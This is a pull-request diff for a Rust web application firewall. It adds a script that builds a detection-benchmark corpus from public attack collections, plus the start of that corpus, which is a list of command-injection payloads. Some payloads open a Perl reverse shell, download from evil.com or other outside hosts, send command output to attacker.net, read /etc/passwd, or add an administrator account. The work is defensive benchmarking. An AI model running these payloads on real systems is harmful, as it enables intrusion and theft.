### PR TITLE
test+feat(waf): corpus-v2 (~1k real payloads) + the aggressive round it drove (30.9%→40.6% @ 0% FP)

### DIFF
--- a/README.md
+++ b/README.md
@@ -245,7 +245,7 @@ MODE=full bash benchmarks/baseline/run-baseline.sh   # → benchmarks/baseline/z
 ## Testing
 
 ```bash
-# Unit tests (613) <!-- zion-stats:test-count (kept in sync by scripts/update-readme-stats.sh) -->
+# Unit tests (615) <!-- zion-stats:test-count (kept in sync by scripts/update-readme-stats.sh) -->
 cargo test
 
 # Integration tests (23 — requires a running Zion + backend)

--- a/README.md
+++ b/README.md
@@ -150,7 +150,7 @@ Client -> TLS 1.3 -> Security Gates -> Radix Router -> WAF Pipeline (5 gates) ->
 ```
 
 <!-- zion-stats:modules-lines (kept in sync by scripts/update-readme-stats.sh) -->
-40 modules, ~28,400 lines of Rust. See [architecture docs](https://fabriziosalmi.github.io/zion/guide/architecture) for the full module map and request lifecycle.
+40 modules, ~28,500 lines of Rust. See [architecture docs](https://fabriziosalmi.github.io/zion/guide/architecture) for the full module map and request lifecycle.
 
 ## Features
 

--- a/benchmarks/waf-corpus/README.md
+++ b/benchmarks/waf-corpus/README.md
@@ -60,24 +60,31 @@ detection stages only) and **PayloadsAllTheThings** (MIT) `Intruder/*.txt`, plus
 **136 benign**. Regenerate with `build-corpus-v2.py` (clone both repos under
 `corpora/` first). Run it: `WAF_CORPUS=corpus-v2.json python3 run.py …`.
 
-### Baseline (v0.4.4, after the v1-driven pattern rounds)
+### Scoreboard (aggressive profile)
 
-| Profile | Detection | False positives |
+| State | Detection | False positives |
 |---|--:|--:|
-| balanced | **16.8%** (178/1058) | **0.0%** (0/136) |
-| aggressive | **30.9%** (327/1058) | **0.0%** (0/136) |
+| v0.4.4 baseline | 30.9% (327/1058) | **0.0%** (0/136) |
+| **+ one targeted round (v0.4.5)** | **40.6%** (430/1058) | **0.0%** (0/136) |
+
+balanced is unchanged at **16.8%** (178/1058, 0% FP) — the round touched only the
+aggressive set.
 
 **This is the number that matters.** v1 was a textbook set and flattered the WAF
-(85%); against ~1k real-world payloads with encodings, bracket/case evasion, and
-obfuscation, the substring scanner catches **~31%** (XSS holds best at 78%; path
-/ php / java / generic / ldap / ssrf are 3–17%) — at an unchanged **0% false
-positives**. That gap *is* the finding: a fast zero-regex gate, not a
-comprehensive WAF.
+(85%); against ~1k real-world payloads the substring scanner started at **~31%**.
+One FP-checked round of high-frequency literals (PHP tags/funcs `<?php`,
+`system(`; Java gadget classes `java.lang.process`, `java.io.`; SSRF schemes
+`file://`, `jar:`; Windows cmdi `net view`; ORM lookups `__startswith`) lifted it
+to **40.6%** — java 16→45%, ssrf 12→44%, php 17→33%, generic 15→35% — at an
+unchanged **0% false positives**. The gap *is* the finding: a fast zero-regex
+gate, not a comprehensive WAF.
 
-**Strategic note for plugging v2 holes:** most v2 misses are *evasions*
-(`/bi%5Bn%5D/bash` → `/bi[n]/bash`, double-encoding, case/comment obfuscation),
-not missing literals. Enumerating patterns has diminishing returns against
-infinite encodings — the high-leverage work is **normalization** (decode
-nested/percent/bracket forms, collapse obfuscation before the scan) and, beyond
-that, semantic/positive-security analysis. Track v2 as the real regression
-number; raise it by improving the normalizer, not just the pattern lists.
+**Why we stop adding literals here.** The residual misses are no longer cheap
+wins — they are base64-encoded gadget chains, `${'a'}('id')`-style PHP
+variable-function obfuscation, exotic IPv6 / decimal / overlong-UTF-8 evasions,
+and `while(true)` DoS probes. Enumerating patterns has sharp diminishing returns
+against infinite encodings, and each broad literal risks a false positive. The
+high-leverage work from here is **normalization** (the double-decode loop already
+defeats `%252e%252e` and `%253Cscript%253E`; the next frontier is base64 and
+bracket/char-insertion forms) and, beyond that, semantic/positive-security
+analysis. Track v2 aggressive as the real regression number.

--- a/benchmarks/waf-corpus/README.md
+++ b/benchmarks/waf-corpus/README.md
@@ -49,4 +49,35 @@ high-precision posture the design claims, now measured.
 
 The point of #0: every WAF-pattern change can now be scored as a Δ in detection
 **at constant 0% FP**, instead of asserted. Plug the holes, re-run, watch the
-number move.
+number move. (v1 + the cmdi/ssrf/deser/sqli rounds landed aggressive at **85.3%**
+against this hand-curated set.)
+
+## corpus-v2 — sourced from public corpora (the honest set)
+
+`corpus-v2.json` — **~1,060 malicious** payloads extracted (deduped, balanced,
+capped per class) from **OWASP CRS** regression tests (Apache-2.0, positive-
+detection stages only) and **PayloadsAllTheThings** (MIT) `Intruder/*.txt`, plus
+**136 benign**. Regenerate with `build-corpus-v2.py` (clone both repos under
+`corpora/` first). Run it: `WAF_CORPUS=corpus-v2.json python3 run.py …`.
+
+### Baseline (v0.4.4, after the v1-driven pattern rounds)
+
+| Profile | Detection | False positives |
+|---|--:|--:|
+| balanced | **16.8%** (178/1058) | **0.0%** (0/136) |
+| aggressive | **30.9%** (327/1058) | **0.0%** (0/136) |
+
+**This is the number that matters.** v1 was a textbook set and flattered the WAF
+(85%); against ~1k real-world payloads with encodings, bracket/case evasion, and
+obfuscation, the substring scanner catches **~31%** (XSS holds best at 78%; path
+/ php / java / generic / ldap / ssrf are 3–17%) — at an unchanged **0% false
+positives**. That gap *is* the finding: a fast zero-regex gate, not a
+comprehensive WAF.
+
+**Strategic note for plugging v2 holes:** most v2 misses are *evasions*
+(`/bi%5Bn%5D/bash` → `/bi[n]/bash`, double-encoding, case/comment obfuscation),
+not missing literals. Enumerating patterns has diminishing returns against
+infinite encodings — the high-leverage work is **normalization** (decode
+nested/percent/bracket forms, collapse obfuscation before the scan) and, beyond
+that, semantic/positive-security analysis. Track v2 as the real regression
+number; raise it by improving the normalizer, not just the pattern lists.

--- a/benchmarks/waf-corpus/build-corpus-v2.py
+++ b/benchmarks/waf-corpus/build-corpus-v2.py
@@ -1,0 +1,177 @@
+#!/usr/bin/env python3
+"""Build corpus-v2.json from public attack corpora → a higher-cardinality WAF
+regression set than the hand-curated v1.
+
+Malicious payloads are DERIVED (extracted + deduped + capped) from:
+  * OWASP CRS regression tests   (Apache-2.0)  github.com/coreruleset/coreruleset
+  * PayloadsAllTheThings         (MIT)         github.com/swisskyrepo/PayloadsAllTheThings
+Benign payloads are hand-curated legit-but-spicy traffic (the false-positive set).
+
+Clone both next to this script's `corpora/` dir, then run. Re-running with the
+same source revisions is deterministic (sorted + capped). Pin the source commits
+in the README when you cut a versioned corpus.
+
+Usage: python3 build-corpus-v2.py [corpora_dir]   →  corpus-v2.json
+"""
+import sys, re, json, glob, hashlib, collections
+from pathlib import Path
+
+HERE = Path(__file__).parent
+CORPORA = Path(sys.argv[1]) if len(sys.argv) > 1 else HERE / "corpora"
+CRS = CORPORA / "coreruleset" / "tests" / "regression" / "tests"
+PATT = CORPORA / "PayloadsAllTheThings"
+PER_CLASS_CAP = 130          # keep classes balanced; total malicious ~1.2k
+MAXLEN = 400                 # drop pathologically long blobs
+
+# CRS rule-dir prefix → our class
+CRS_CLASS = {
+    "REQUEST-941": "xss", "REQUEST-942": "sqli", "REQUEST-932": "cmdi",
+    "REQUEST-930": "path", "REQUEST-931": "ssrf", "REQUEST-933": "php",
+    "REQUEST-934": "generic", "REQUEST-944": "java", "REQUEST-921": "crlf",
+}
+# PayloadsAllTheThings dir → our class
+PATT_CLASS = {
+    "Command Injection": "cmdi", "SQL Injection": "sqli", "XSS Injection": "xss",
+    "NoSQL Injection": "nosql", "Insecure Deserialization": "deser",
+    "Server Side Template Injection": "ssti", "LDAP Injection": "ldap",
+    "XPATH Injection": "xpath", "GraphQL Injection": "graphql",
+    "CRLF Injection": "crlf", "Directory Traversal": "path",
+    "Client Side Path Traversal": "path", "Server Side Request Forgery": "ssrf",
+    "XML External Entity": "xxe", "Server Side Include Injection": "ssi",
+}
+
+buckets = collections.defaultdict(set)   # class -> set(payload)
+
+
+_BENIGN_URL = re.compile(r"^https?://(example\.(com|org|net)|[\w.-]+)/?$", re.I)
+_PURE_WORD = re.compile(r"^[A-Za-z0-9_-]{1,14}$")   # bare short token, no special chars
+
+
+def clean(p):
+    p = p.strip()
+    if not p or len(p) > MAXLEN:
+        return None
+    if p.startswith(("#", "//", "<!--")):              # comments / headings
+        return None
+    if not any(33 <= ord(c) < 127 or ord(c) > 127 for c in p):
+        return None
+    # Drop CRS/test noise that isn't an attack: bare benign URLs + short
+    # alpha-only tokens (`test`, `aint-pizza`, lone event-handler names).
+    if _BENIGN_URL.match(p) or _PURE_WORD.match(p):
+        return None
+    return p
+
+
+# ── CRS: parse regression YAMLs ─────────────────────────────────────────────
+try:
+    import yaml
+    for d, cls in CRS_CLASS.items():
+        for yf in glob.glob(str(CRS / f"{d}-*" / "**" / "*.yaml"), recursive=True):
+            try:
+                doc = yaml.safe_load(Path(yf).read_text(errors="replace"))
+            except Exception:
+                continue
+            for t in (doc or {}).get("tests", []):
+                for st in t.get("stages", []):
+                    stage = st.get("stage", st)
+                    inp = stage.get("input") or {}
+                    out = stage.get("output") or {}
+                    # Only positive-detection tests: a stage that EXPECTS a rule
+                    # to fire is a real attack; negative/benign baselines are not.
+                    expect = (out.get("log") or {}).get("expect_ids") or out.get("expect_ids")
+                    if not expect:
+                        continue
+                    # body payload
+                    data = inp.get("data")
+                    if isinstance(data, list):
+                        data = "\n".join(map(str, data))
+                    if data and (c := clean(str(data))):
+                        buckets[cls].add(c)
+                    # query-string value(s) from the uri
+                    uri = inp.get("uri", "")
+                    if isinstance(uri, str) and "?" in uri:
+                        q = uri.split("?", 1)[1]
+                        for kv in q.split("&"):
+                            v = kv.split("=", 1)[1] if "=" in kv else kv
+                            if (c := clean(v)):
+                                buckets[cls].add(c)
+except ImportError:
+    print("warn: PyYAML missing — skipping CRS", file=sys.stderr)
+
+# ── PayloadsAllTheThings: Intruder/*.txt (one payload per line) ──────────────
+for dirname, cls in PATT_CLASS.items():
+    base = PATT / dirname
+    if not base.exists():
+        continue
+    for txt in glob.glob(str(base / "**" / "*.txt"), recursive=True):
+        for line in Path(txt).read_text(errors="replace").splitlines():
+            if (c := clean(line)):
+                buckets[cls].add(c)
+
+# ── balance + assemble ──────────────────────────────────────────────────────
+corpus = []
+for cls, payloads in sorted(buckets.items()):
+    # deterministic sample: sort, then cap (stable hash tie-break keeps variety)
+    ordered = sorted(payloads, key=lambda p: (hashlib.md5(p.encode()).hexdigest(), p))
+    for p in ordered[:PER_CLASS_CAP]:
+        corpus.append({"category": cls, "kind": "mal", "payload": p})
+
+# ── benign (false-positive testers) — hand-curated legit-but-spicy ──────────
+BENIGN = [
+ "SELECT a plan that fits your team", "I'll alert you the moment it's ready",
+ "the union of designers and engineers", "price > 100 AND rating < 5 stars",
+ "1=1 is a tautology we cover in math class", "O'Brien", "D'Angelo & Sons, Inc.",
+ "user@example.com", "https://maps.example.com/?q=cafe+near+me", "function() { return total * 1.2; }",
+ "<b>Bold</b> and <i>italic</i> text", "path/to/my/report.2024.json", "drop me an email when you can",
+ "a great script for the school play", "SELECT-O-MATIC vacuum, model X", "comment count: 42; likes: 1337",
+ "2 * 7 = 14 and 7 * 7 = 49", "order by date, then by name please", "the cat sat on the mat",
+ "{\"name\":\"Acme\",\"qty\":3,\"price\":9.99}", "search: best practices for REST APIs", "passwd reset link requested",
+ "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NSJ9.abc", "git commit -m 'fix the parser'",
+ "let x = a && b || c;", "the script kiddie movie was fun", "100% organic & fair-trade",
+ "regex: ^[a-z]+$ matches lowercase", "a < b and b > c", "<!-- this is an HTML comment -->",
+ "SELECT * is an anti-pattern, avoid it", "alert: low disk space on /var", "the password must be 12+ chars",
+ "Q1 revenue grew 7*7 percent (kidding)", "DROP-DOWN menu styling", "use UNION types in TypeScript",
+ "../docs/readme.md relative link", "cmd+shift+p opens the palette", "{{ user.name }} in a Jinja template doc",
+ "$HOME/.config/app.toml", "exec summary attached", "id: 12345, name: Acme Corp",
+ "onclick handlers should be CSP-safe", "the order by which we ship matters", "select your seat from the map",
+ "I command the room when I present", "traverse the directory tree carefully", "inject some humor into the deck",
+ "a template for the quarterly review", "evaluate the proposal by Friday", "concatenate the two reports",
+ "https://en.wikipedia.org/wiki/SQL_injection", "the article explains XSS for beginners",
+ "our LDAP directory lists 400 staff", "the GraphQL schema has 30 types", "deserialize the JSON into a struct",
+ "char limit is 280 like old Twitter", "true && ready to ship", "x = y == z ? 1 : 0",
+ "the union meeting is at 5pm", "drop the puck — hockey starts!", "ping me on Slack",
+ "curl up with a good book", "the cat command prints files", "we use bash for our scripts",
+ "ls of attendees attached", "echo chamber of opinions", "rm stands for 'remove' in Unix class",
+ "a 1' golf putt", "she said \"hello\" and waved", "co-op & condo listings",
+ "name: O'Reilly Media", "the file is at C:/Users/me/doc.txt", "rate: 5 > 4 > 3 stars",
+ "100 OR more attendees expected", "AND/OR logic gates lecture", "the SELECT committee meets Tuesday",
+ "<h1>Welcome</h1> to our site", "<a href=\"https://example.com\">link</a>", "markdown **bold** and _italic_",
+ "the proto file defines the API", "constructor of the class takes 2 args", "an object with id and name fields",
+ "system design interview prep", "process the queue in order", "runtime is O(n log n)",
+ "the template literal `${name}` in JS docs", "use && to chain commands in the tutorial",
+ "café, naïve, résumé — accented words", "emoji test: rocket and sparkles", "Tokyo, Japan — 35.6N",
+ "two plus two equals four", "the quick brown fox jumps", "lorem ipsum dolor sit amet",
+ "version 1.2.3 released today", "ticket #4567 is resolved", "discount code SAVE20 applied",
+ "meeting notes: action items below", "the API returns 200 on success", "HTTP 404 means not found",
+ "JSON over HTTPS is standard", "OAuth2 bearer token in header", "rate limit: 100 req/min",
+ "the cache TTL is 3600 seconds", "gzip compression enabled", "CDN edge in eu-west-1",
+ "select all that apply", "union square is in NYC", "the drop ceiling needs repair",
+ "command line interface basics", "path of least resistance", "template ready for review",
+ "we evaluate vendors quarterly", "the script for episode 3", "alert fatigue is real",
+ "inject confidence into the team", "traverse from A to B", "a benign query: products?sort=price",
+ "search?q=rust+web+framework", "filter by category=books", "page=2&limit=20",
+ "user-agent: Mozilla/5.0 normal browser", "referer from our own domain", "accept: application/json",
+ "the form has name and email fields", "upload a profile picture", "comment posted successfully",
+ "shopping cart has 3 items", "checkout total is $49.99", "shipping to 90210",
+ "the README explains setup", "see CONTRIBUTING.md for guidelines", "license is Apache-2.0",
+ "stack trace truncated for brevity", "log level set to INFO", "debug mode is off in prod",
+]
+
+for p in BENIGN:
+    corpus.append({"category": "benign", "kind": "benign", "payload": p})
+
+mal = sum(1 for c in corpus if c["kind"] == "mal")
+ben = sum(1 for c in corpus if c["kind"] == "benign")
+(HERE / "corpus-v2.json").write_text(json.dumps(corpus, ensure_ascii=False, indent=1))
+print(f"wrote corpus-v2.json — {len(corpus)} entries ({mal} malicious / {ben} benign)")
+print("per-class:", dict(sorted(collections.Counter(c["category"] for c in corpus if c["kind"]=="mal").items())))

--- a/benchmarks/waf-corpus/corpus-v2.json
+++ b/benchmarks/waf-corpus/corpus-v2.json
@@ -1,0 +1,5972 @@
+[
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "/bi%5Bn%5D/bash"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "| sleep 15"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "%0d%0aa001%20EXAMINE%20INBOX"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "&& net view"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "| dir C:\\Users"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "() { :;}; /bin/bash -c \"wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\\`whoami\\`\""
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "IF+%5B%251%5D%3D%3D%5B%2F%3F%5D+..."
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "&& whoami"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "& sleep 5"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "%2F%3F%3F%3F%2F%3F%3Ft"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "\\n/usr/bin/id;"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23')"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "; reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "type C:\\Windows\\repair\\SYSTEM"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "cmd%3Da%3Dcurl%26%26b%3D%60whoami%60%26%26%24a%20attacker.net%2F%24b"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "code=;cd /;cd etc;base32 passwd|base32 -d"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "ping$()%20127.0.0.1"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "alias%20a=b"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "| ls -l /var/www/*"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "() { :;}; /bin/bash -c \"curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\\`pwd\\`\""
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};\" > rev.pl"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "() { :;};/usr/bin/perl -e 'print \\\"Content-Type: text/plain\\\\r\\\\n\\\\r\\\\nXSUCCESS!\\\";system(\\\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\\\");'"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "pip%20install%20something"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "; sleep 15"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "echo \"<?php system('dir $_GET['dir']'); ?>\" > dir.php"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "%3Biwmi%20-class%20Win32_process%20-name%20Create%20-ArgumentList%20cmd"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "CD /;CD ETC;COMM PASSWD PASSWD"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "; system('sleep 5');"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "/etc/%5B!q%5Dasswd"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "IF++++++++EXIST+filename.txt+++++%28"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "view%3Dimage.jpg%26bcdboot%20%2Fr%20file.txt"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "%3Bps"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "&& systeminfo"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "& id"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "'\\n/bin/ls -al\\n'"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "code=cat<<<$(whoami | sh)"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "for%20%2ff%20%25variable%20in%20%28%27command%27%29%20do%20command"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "&& echo \"<?php include($_GET['page']); ?>\" > rfi.php"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "'|id|'"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "\" & whoami"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "printf%20dW5hbWUgLWE=%7Cbase64%20-d%7Csh"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "system('ls')"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "for+%2Ff+%22tokens%3D%2A%22+%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25G"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "code=;vi dddd +silent\\\\ \\!whoami +wq"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "time+curl+coreruleset.org"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "code=;vi -c:\\!pwd"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "find /etc -name passwd -exec cat {} +"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "\"& ping -i 30 127.0.0.1 &\""
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "test*; ls -lhtR /var/www/"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": ";/usr/bin/id|"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "() { :;}; /bin/bash -c \"curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\\`nc -lvvp 1234 -e /bin/bash\\`\""
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25G"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "rce=alias a=c${KK}url&a google.com"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "; ifconfig"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "932120-2=Invoke-WebRequest http://example.com/path/file.ps1"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "/index.html|id|"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "eval('sleep 5');"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "&& ls -laR /etc"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "%28%29%20%7B"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "for+%25%25d+in+%28A%2CC%2CD%29+do+DIR+%25%25d+%2A.%2A"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "%26+FOR+%25%25a+IN+%28a%2Cb%2Cc%29+DO+cmd"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": ";echo '<script>alert(1)</script>'"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "%3B%20certutil%20-urlcache%20-f%20http%3A%2F%2Fevil.com%2Fpayload.exe"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "; netsh firewall set opmode disable"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "\"\\n/bin/ls -al\\n\""
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "\"||/usr/bin/id|\""
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "|id"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "%0d%0aTOP%201%202"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "() { :;}; /bin/bash -c \"sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6\""
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "| netsh firewall set opmode disable"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "IF++++++++DEFINED+variable+++++++CMD"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "%0a id %0a"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "${@print(system($_SERVER['HTTP_USER_AGENT']))}"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "cat%20%2Fetc%2F%5Bp%2F%2F%5Dasswd"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "cat%20/%5B%3F%5Dtc/pa%5B%3F%5Dswd"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "dir C:\\Documents and Settings\\*"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "$(`dir`)"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "; dir C:\\Documents and Settings\\*"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": ";id\\n"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "www.google.com;c%24%40at%2B%2Fet%24%40c%2Fpas%24%40swd"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "%7b%2c%69%66%63%6f%6e%66%69%67%2c%65%74%68%30%7d"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "; net localgroup Administrators hacker /ADD"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "{\"foo\": \"${:1337:-x$}{jndi:ldap://evil.com/webshell}\"}"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "whoami;0'0'\""
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "&& curl https://crowdshield.com/.testing/rce_vuln.txt"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "& dir"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "&& type %SYSTEMROOT%\\repair\\SYSTEM"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "%27%27that%27s%20the%20joke%27%27.jpeg"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "code=;`cat<<<\"ifconfig\"`"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "| ifconfig"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "cmd=zstdcat /var/log/sensitive_log_file.zst"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "| sysinfo"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "code=time; ansible-galaxy collection install community.general"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "%0d%0aEHLO%20test.com"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "code=ansible-config dump"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "IF++++++++EXIST+filename+++++++++CMD"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "{{ get_user_file(\"C:\\boot.ini\") }}"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "payload=py''thon -c \"print('attack')\""
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "%24%7B%60id%60%7D"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "; sleep 5"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "IF++++++++%25ERRORLEVEL%25+GTR+2+++++echo+test"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "$(`type C:\\boot.ini`)"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "if+not+%22A%251%22+%3D%3D+%22A%22+%28"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "IF++++++++%5B%251%5D%3D%3D%5B%5D+++++++++++++++ECHO+Value+Missing"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "\\n"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "rce=alias -p jzfrx=id"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "a)|id;"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "FOR+%2FL+%2FL+%2FL+++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "; ls -l /tmp"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "cat /etc/passwd"
+ },
+ {
+  "category": "cmdi",
